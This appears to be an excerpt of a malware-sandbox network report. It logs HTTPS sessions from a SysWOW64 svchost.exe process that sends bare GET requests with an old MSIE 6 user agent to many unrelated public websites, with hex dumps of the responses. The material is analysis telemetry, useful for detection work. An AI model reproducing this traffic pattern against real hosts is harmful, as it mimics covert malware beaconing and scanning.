                                                                                                                                                                                                                                                                          2023-07-05 06:07:13 UTC297INData Raw: 20 31 31 33 2e 31 35 34 20 36 31 2e 31 34 34 20 31 31 34 2e 39 39 36 20 36 33 2e 32 35 38 20 31 31 36 2e 38 33 34 20 36 31 2e 31 34 34 20 31 31 34 2e 39 39 36 20 35 39 2e 30 33 31 22 20 66 69 6c 6c 3d 22 23 66 66 66 22 2f 3e 3c 70 6f 6c 79 67 6f 6e 20 70 6f 69 6e 74 73 3d 22 31 31 34 2e 39 39 36 20 34 37 2e 32 32 35 20 31 31 33 2e 31 35 34 20 34 39 2e 33 33 38 20 31 31 34 2e 39 39 36 20 35 31 2e 34 35 32 20 31 31 36 2e 38 33 34 20 34 39 2e 33 33 38 20 31 31 34 2e 39 39 36 20 34 37 2e 32 32 35 22 20 66 69 6c 6c 3d 22 23 66 66 66 22 2f 3e 3c 70 6f 6c 79 67 6f 6e 20 70 6f 69 6e 74 73 3d 22 31 31 34 2e 39 39 36 20 33 35 2e 34 31 39 20 31 31 33 2e 31 35 34 20 33 37 2e 35 33 32 20 31 31 34 2e 39 39 36 20 33 39 2e 36 34 36 20 31 31 36 2e 38 33 34 20 33 37 2e 35
                                                                                                                                                                                                                                                                          Data Ascii: 113.154 61.144 114.996 63.258 116.834 61.144 114.996 59.031" fill="#fff"/><polygon points="114.996 47.225 113.154 49.338 114.996 51.452 116.834 49.338 114.996 47.225" fill="#fff"/><polygon points="114.996 35.419 113.154 37.532 114.996 39.646 116.834 37.5
                                                                                                                                                                                                                                                                          2023-07-05 06:07:13 UTC313INData Raw: 34 2e 39 32 31 20 32 34 30 2e 30 34 32 20 31 34 32 2e 38 30 38 20 32 33 38 2e 32 30 33 20 31 34 30 2e 36 39 34 22 20 66 69 6c 6c 3d 22 23 66 66 66 22 2f 3e 3c 70 6f 6c 79 67 6f 6e 20 70 6f 69 6e 74 73 3d 22 32 34 36 2e 36 33 38 20 32 32 35 2e 34 35 31 20 32 34 38 2e 34 37 38 20 32 32 37 2e 35 36 35 20 32 35 30 2e 33 31 36 20 32 32 35 2e 34 35 31 20 32 34 38 2e 34 37 38 20 32 32 33 2e 33 33 37 20 32 34 36 2e 36 33 38 20 32 32 35 2e 34 35 31 22 20 66 69 6c 6c 3d 22 23 66 66 66 22 2f 3e 3c 70 6f 6c 79 67 6f 6e 20 70 6f 69 6e 74 73 3d 22 32 34 38 2e 34 37 38 20 32 31 35 2e 37 35 39 20 32 35 30 2e 33 31 36 20 32 31 33 2e 36 34 35 20 32 34 38 2e 34 37 38 20 32 31 31 2e 35 33 31 20 32 34 36 2e 36 33 36 20 32 31 33 2e 36 34 35 20 32 34 38 2e 34 37 38 20 32 31 35
                                                                                                                                                                                                                                                                          Data Ascii: 4.921 240.042 142.808 238.203 140.694" fill="#fff"/><polygon points="246.638 225.451 248.478 227.565 250.316 225.451 248.478 223.337 246.638 225.451" fill="#fff"/><polygon points="248.478 215.759 250.316 213.645 248.478 211.531 246.636 213.645 248.478 215
                                                                                                                                                                                                                                                                          2023-07-05 06:07:13 UTC329INData Raw: 38 20 39 34 2e 34 34 38 20 32 30 33 2e 39 35 32 20 39 36 2e 32 38 36 20 32 30 31 2e 38 33 38 20 39 34 2e 34 34 38 20 31 39 39 2e 37 32 35 22 20 66 69 6c 6c 3d 22 23 66 66 66 22 2f 3e 3c 70 6f 6c 79 67 6f 6e 20 70 6f 69 6e 74 73 3d 22 39 34 2e 34 34 38 20 31 38 37 2e 39 31 39 20 39 32 2e 36 31 20 31 39 30 2e 30 33 32 20 39 34 2e 34 34 38 20 31 39 32 2e 31 34 36 20 39 36 2e 32 38 36 20 31 39 30 2e 30 33 32 20 39 34 2e 34 34 38 20 31 38 37 2e 39 31 39 22 20 66 69 6c 6c 3d 22 23 66 66 66 22 2f 3e 3c 70 6f 6c 79 67 6f 6e 20 70 6f 69 6e 74 73 3d 22 39 34 2e 34 34 38 20 31 37 36 2e 31 31 33 20 39 32 2e 36 31 20 31 37 38 2e 32 32 36 20 39 34 2e 34 34 38 20 31 38 30 2e 33 34 20 39 36 2e 32 38 36 20 31 37 38 2e 32 32 36 20 39 34 2e 34 34 38 20 31 37 36 2e 31 31 33
                                                                                                                                                                                                                                                                          Data Ascii: 8 94.448 203.952 96.286 201.838 94.448 199.725" fill="#fff"/><polygon points="94.448 187.919 92.61 190.032 94.448 192.146 96.286 190.032 94.448 187.919" fill="#fff"/><polygon points="94.448 176.113 92.61 178.226 94.448 180.34 96.286 178.226 94.448 176.113


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                          15192.168.2.650348104.21.48.207443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2023-07-05 06:07:19 UTC1139OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                          Accept: *
                                                                                                                                                                                                                                                                          Accept-Language: en-us
                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          Host: orlyhotel.com
                                                                                                                                                                                                                                                                          Cookie: django_language=en
                                                                                                                                                                                                                                                                          2023-07-05 06:07:19 UTC1155INHTTP/1.1 500 Internal Server Error
                                                                                                                                                                                                                                                                          Date: Wed, 05 Jul 2023 06:07:19 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          Cache-Control: max-age=0, no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                          Expires: Wed, 05 Jul 2023 05:55:28 GMT
                                                                                                                                                                                                                                                                          Content-Language: en
                                                                                                                                                                                                                                                                          Last-Modified: Wed, 05 Jul 2023 05:55:28 GMT
                                                                                                                                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                          Vary: Accept-Language
                                                                                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2BKYmJmFNEv2lKZ1Jn8dyxmzoxgqY9b8qUrRruYd%2FqIdcbNqP35rZQtjp1%2BCOThvk%2Bgcflr59tPMFpI5h704zqDha%2BEIRAPIa7TDXK730MMudwwjuTSYps7dJCogLE3jW"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                                                          CF-RAY: 7e1d6d525d901911-FRA
                                                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                          2023-07-05 06:07:19 UTC1156INData Raw: 31 62 0d 0a 3c 68 31 3e 53 65 72 76 65 72 20 45 72 72 6f 72 20 28 35 30 30 29 3c 2f 68 31 3e 0d 0a
                                                                                                                                                                                                                                                                          Data Ascii: 1b<h1>Server Error (500)</h1>
                                                                                                                                                                                                                                                                          2023-07-05 06:07:19 UTC1156INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                          16192.168.2.65035275.2.95.235443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2023-07-05 06:07:20 UTC1604OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                          Accept: *
                                                                                                                                                                                                                                                                          Accept-Language: en-us
                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          Host: ldh.la.gov
                                                                                                                                                                                                                                                                          2023-07-05 06:07:20 UTC1604INHTTP/1.1 406 Not Acceptable
                                                                                                                                                                                                                                                                          Date: Wed, 05 Jul 2023 06:07:20 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                                                                                          Content-Length: 1346
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          Server: Microsoft-IIS/10.0
                                                                                                                                                                                                                                                                          X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                                          2023-07-05 06:07:20 UTC1604INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 36 20 2d 20 43 6c 69
                                                                                                                                                                                                                                                                          Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>406 - Cli


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                          17192.168.2.6515725.189.171.125443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2023-07-05 06:07:21 UTC1606OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                          Accept: *
                                                                                                                                                                                                                                                                          Accept-Language: en-us
                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          Host: www.muhr-soehne.de
                                                                                                                                                                                                                                                                          2023-07-05 06:07:21 UTC1606INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Date: Wed, 05 Jul 2023 06:07:21 GMT
                                                                                                                                                                                                                                                                          Server: Apache/2.4.38 (Debian)
                                                                                                                                                                                                                                                                          Last-Modified: Fri, 30 Jun 2023 05:41:10 GMT
                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                          Content-Length: 53069
                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                          2023-07-05 06:07:21 UTC1606INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 20 6c 61 6e 67 3d 22 64 65 22 3e 0a 3c 68 65 61 64 3e 0a 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 21 2d 2d 20 0a 09 6d 61 64 65 20 62 79 20 50 53 56 6e 65 6f 0a 0a 09 54 68 69 73 20 77 65 62 73 69 74 65 20 69 73 20 70 6f 77 65 72 65 64 20 62 79 20 54 59 50 4f 33 20 2d 20 69 6e 73 70 69 72 69 6e 67 20 70 65 6f 70 6c 65 20 74 6f 20 73 68 61 72 65 21 0a 09 54 59 50 4f 33 20 69 73 20 61 20 66 72 65 65 20 6f 70 65 6e 20 73 6f 75 72 63 65 20 43 6f 6e 74 65 6e 74 20 4d 61 6e 61 67 65 6d 65 6e 74 20 46 72 61 6d 65 77 6f 72 6b 20 69 6e 69 74 69 61 6c 6c 79 20 63 72 65 61 74 65 64 20 62 79 20 4b 61 73 70 65 72 20 53 6b 61 61 72 68 6f 6a 20
                                                                                                                                                                                                                                                                          Data Ascii: <!DOCTYPE html><html dir="ltr" lang="de"><head><meta charset="utf-8">... made by PSVneoThis website is powered by TYPO3 - inspiring people to share!TYPO3 is a free open source Content Management Framework initially created by Kasper Skaarhoj
                                                                                                                                                                                                                                                                          2023-07-05 06:07:21 UTC1622INData Raw: 69 74 65 6d 20 6c 61 79 6f 75 74 2d 30 20 20 22 3e 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 2f 76 65 72 73 63 68 6c 69 65 73 73 74 65 63 68 6e 69 6b 2f 76 65 72 73 63 68 6c 69 65 73 73 6d 61 73 63 68 69 6e 65 6e 22 20 74 69 74 6c 65 3d 22 56 65 72 73 63 68 6c 69 65 c3 9f 6d 61 73 63 68 69 6e 65 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 56 65 72 73 63 68 6c 69 65 c3 9f 6d 61 73 63 68 69 6e 65 6e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20
                                                                                                                                                                                                                                                                          Data Ascii: item layout-0 "> <a href="/verschliesstechnik/verschliessmaschinen" title="Verschliemaschinen"> Verschliemaschinen </a>
                                                                                                                                                                                                                                                                          2023-07-05 06:07:21 UTC1638INData Raw: 72 2e 6a 70 67 22 3e 3c 73 6f 75 72 63 65 20 6d 65 64 69 61 3d 22 28 6d 61 78 2d 77 69 64 74 68 3a 20 37 36 37 70 78 29 20 61 6e 64 20 28 6f 72 69 65 6e 74 61 74 69 6f 6e 3a 6c 61 6e 64 73 63 61 70 65 29 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 73 72 63 73 65 74 3d 22 2f 66 69 6c 65 61 64 6d 69 6e 2f 75 73 65 72 5f 75 70 6c 6f 61 64 2f 4e 61 63 68 68 61 6c 74 69 67 6b 65 69 74 2f 63 73 6d 5f 6d 65 74 61 6c 5f 72 65 63 79 63 6c 65 73 5f 66 6f 72 65 76 65 72 2e 6a 70 67 22 3e 3c 73 6f 75 72 63 65 20 6d 65 64 69 61 3d 22 28 6d 61 78 2d 77 69 64 74 68 3a 20 39 39 31 70 78 29 20 61 6e 64 20 28 6f 72 69 65 6e 74 61 74 69 6f 6e 3a 70 6f 72 74 72 61 69 74 29 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 73 72 63 73 65 74 3d 22 2f 66 69 6c 65
                                                                                                                                                                                                                                                                          Data Ascii: r.jpg"><source media="(max-width: 767px) and (orientation:landscape)" srcset="/fileadmin/user_upload/Nachhaltigkeit/csm_metal_recycles_forever.jpg"><source media="(max-width: 991px) and (orientation:portrait)" srcset="/file
                                                                                                                                                                                                                                                                          2023-07-05 06:07:21 UTC1654INData Raw: 20 20 20 20 20 20 73 72 63 73 65 74 3d 22 2f 66 69 6c 65 61 64 6d 69 6e 2f 5f 70 72 6f 63 65 73 73 65 64 5f 2f 65 2f 63 2f 63 73 6d 5f 65 66 72 65 2d 65 75 5f 34 38 30 5f 30 32 62 64 33 65 31 34 64 39 2e 6a 70 67 22 3e 3c 73 6f 75 72 63 65 20 6d 65 64 69 61 3d 22 28 6d 61 78 2d 77 69 64 74 68 3a 20 39 39 31 70 78 29 20 61 6e 64 20 28 6f 72 69 65 6e 74 61 74 69 6f 6e 3a 70 6f 72 74 72 61 69 74 29 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 73 72 63 73 65 74 3d 22 2f 66 69 6c 65 61 64 6d 69 6e 2f 5f 70 72 6f 63 65 73 73 65 64 5f 2f 65 2f 63 2f 63 73 6d 5f 65 66 72 65 2d 65 75 5f 34 38 30 5f 30 32 62 64 33 65 31 34 64 39 2e 6a 70 67 22 3e 3c 73 6f 75 72 63 65 20 6d 65 64 69 61 3d 22 28 6d 61 78 2d 77 69 64 74 68 3a 20 39 39 31 70 78 29 20 61 6e 64
                                                                                                                                                                                                                                                                          Data Ascii: srcset="/fileadmin/_processed_/e/c/csm_efre-eu_480_02bd3e14d9.jpg"><source media="(max-width: 991px) and (orientation:portrait)" srcset="/fileadmin/_processed_/e/c/csm_efre-eu_480_02bd3e14d9.jpg"><source media="(max-width: 991px) and


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                          18192.168.2.65211691.229.22.126443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2023-07-05 06:07:23 UTC1658OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                          Accept: *
                                                                                                                                                                                                                                                                          Accept-Language: en-us
                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          Host: pleszew.policja.gov.pl
                                                                                                                                                                                                                                                                          2023-07-05 06:07:23 UTC1659INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                          Date: Wed, 05 Jul 2023 06:08:55 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                          2023-07-05 06:07:23 UTC1659INData Raw: 31 66 63 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 70 6c 22 3e 0d 0a 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 20 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 49 6e 64 65 78 2c 20 46 6f 6c 6c 6f 77 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 4b 50 50 20 50 6c 65
                                                                                                                                                                                                                                                                          Data Ascii: 1fc0<!DOCTYPE html><html lang="pl"> <head> <meta charset="UTF-8"/> <meta name="description" content=" "/> <meta name="keywords" content=""/> <meta name="robots" content="Index, Follow"/> <meta name="author" content="KPP Ple
                                                                                                                                                                                                                                                                          2023-07-05 06:07:23 UTC1675INData Raw: 6e 74 65 6e 74 2d 6c 65 66 74 20 20 2d 2d 3e 0d 0a 20 20 3c 61 72 74 69 63 6c 65 20 69 64 3d 22 77 74 78 74 22 20 63 6c 61 73 73 3d 22 6d 61 69 6e 4c 65 66 74 22 3e 0d 0a 20 20 20 20 0d 0a 20 20 20 20 3c 21 2d 2d 20 20 61 6b 74 75 61 6c 6e 6f 73 63 69 20 20 2d 2d 3e 0d 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 61 67 6c 6f 77 65 6b 31 22 3e 3c 68 32 3e 41 6b 74 75 61 6c 6e 6f c5 9b 63 69 3c 0d 0a 32 30 30 30 0d 0a 2f 68 32 3e 0d 0a 20 20 3c 21 2d 2d 20 6f 70 63 6a 65 20 6e 65 77 73 2e 20 2d 2d 3e 0d 0a 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 61 67 5f 6d 65 6e 75 22 3e 0d 0a 20 20 20 20 3c 75 6c 20 63 6c 61 73 73 3d 22 6e 61 67 5f 6d 65 6e 75 5f 6c 69 73 74 22 3e 0d 0a 20 20 20 20 20 20 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 2f 77 32 30 2f 70 61 6e 65
                                                                                                                                                                                                                                                                          Data Ascii: ntent-left --> <article id="wtxt" class="mainLeft"> ... aktualnosci --><div class="naglowek1"><h2>Aktualnoci<2000/h2> ... opcje news. --> <div class="nag_menu"> <ul class="nag_menu_list"> <li><a href="/w20/pane
                                                                                                                                                                                                                                                                          2023-07-05 06:07:23 UTC1691INData Raw: 65 6c 3d 22 7a 61 6f 62 73 65 72 77 6f 77 61 6c 65 73 22 3e 3c 69 6d 67 20 73 72 63 3d 22 2f 64 6f 6b 75 6d 65 6e 74 79 2f 62 61 74 6f 6e 79 2f 33 39 36 32 2e 6a 70 67 3f 76 3d 31 36 35 37 31 31 32 36 31 38 22 20 61 6c 74 3d 22 7a 61 6f 62 73 65 72 77 6f 77 61 6c 65 73 22 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 22 74 72 75 65 22 20 2f 3e 3c 2f 61 3e 3c 2f 64 69 76 3e 0a 09 09 0a 09 0a 09 09 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 0d 0a 31 30 30 30 0d 0a 69 74 65 6d 22 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 33 30 30 70 78 3b 20 68 65 69 67 68 74 3a 37 34 70 78 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 30 70 78 22 3e 3c 61 20 68 72 65 66 3d 22 2f 77 32 30 2f 62 61 74 6f 6e 79 2f 34 31 30 34 2c 47 6c 75 63 68 6f 6e 69 65 6d 69 2e 68 74 6d 6c
                                                                                                                                                                                                                                                                          Data Ascii: el="zaobserwowales"><img src="/dokumenty/batony/3962.jpg?v=1657112618" alt="zaobserwowales" aria-hidden="true" /></a></div><div class="1000item" style="width:300px; height:74px;margin-bottom:10px"><a href="/w20/batony/4104,Gluchoniemi.html
                                                                                                                                                                                                                                                                          2023-07-05 06:07:23 UTC1707INData Raw: 72 c4 99 20 73 74 72 6f 6e 79 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 2f 64 69 76 3e 0d 0a 20 20 09 3c 21 2d 2d 20 47 6f 54 6f 54 6f 70 20 20 2e 2d 2d 3e 20 0d 0a 20 20 20 20 0d 0a 20 20 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 3c 21 2d 2d 20 30 2e 30 34 30 36 31 36 20 2f 20 57 65 62 41 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 28 30 35 2e 30 37 2e 32 30 32 33 20 30 38 3a 30 38 29 20 2f 2f 2d 2d 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                          Data Ascii: r strony</span></a></div> ... GoToTop .--> </body></html>... 0.040616 / WebAdministrator (05.07.2023 08:08) //-->0


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                          19192.168.2.652102185.237.66.112443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2023-07-05 06:07:23 UTC1658OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                          Accept: *
                                                                                                                                                                                                                                                                          Accept-Language: en-us
                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          Host: techtrans.de
                                                                                                                                                                                                                                                                          2023-07-05 06:07:23 UTC1658INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                                          Date: Wed, 05 Jul 2023 06:07:23 GMT
                                                                                                                                                                                                                                                                          Server: Apache
                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                          Cache-Control: no-cache, no-store, must-revalidate
                                                                                                                                                                                                                                                                          Expires: 0
                                                                                                                                                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                          Upgrade: h2,h2c
                                                                                                                                                                                                                                                                          Connection: Upgrade, close
                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                          2023-07-05 06:07:23 UTC1658INData Raw: 32 63 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 27 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 27 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4e 69 6e 6a 61 46 69 72 65 77 61 6c 6c 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 43 6f 6e 74 65 6e 74 2d 54 79 70 65 27 20 63 6f 6e 74 65 6e 74 3d 27 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 27 3e 3c 2f 68 65 61 64 3e 3c 62
                                                                                                                                                                                                                                                                          Data Ascii: 2c2<!DOCTYPE HTML PUBLIC '-//IETF//DTD HTML 2.0//EN'><html><head><title>NinjaFirewall 403 Forbidden</title><style>body{font-family:sans-serif;font-size:13px;color:#000;}</style><meta http-equiv='Content-Type' content='text/html; charset=utf-8'></head><b


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                          2192.168.2.650154172.67.164.178443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2023-07-05 06:07:06 UTC1OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                          Accept: *
                                                                                                                                                                                                                                                                          Accept-Language: en-us
                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          Host: clinicasanluis.com.co
                                                                                                                                                                                                                                                                          2023-07-05 06:07:06 UTC53INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Date: Wed, 05 Jul 2023 06:07:06 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          Expires: Wed, 17 Aug 2005 00:00:00 GMT
                                                                                                                                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                          Set-Cookie: d55e479f054c94814cbc10d217aaa990=2bff9442b12485418e3a501b44a59acc; path=/; HttpOnly
                                                                                                                                                                                                                                                                          Last-Modified: Wed, 05 Jul 2023 06:07:06 GMT
                                                                                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=VhtaZOk%2BGu5W6kc9mxDdeCU8gHz86WejaqVlojuky%2BARpV%2BW0mrOMx1roTNmqvmJz3218%2B3100n5oaEB9k7nm%2FUEw5%2F6qyXsiPg7lANmJ4H22f7hC2kT4wP9LC4S2FJtepMv%2F4EgO8s%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                                                          CF-RAY: 7e1d6d019d109195-FRA
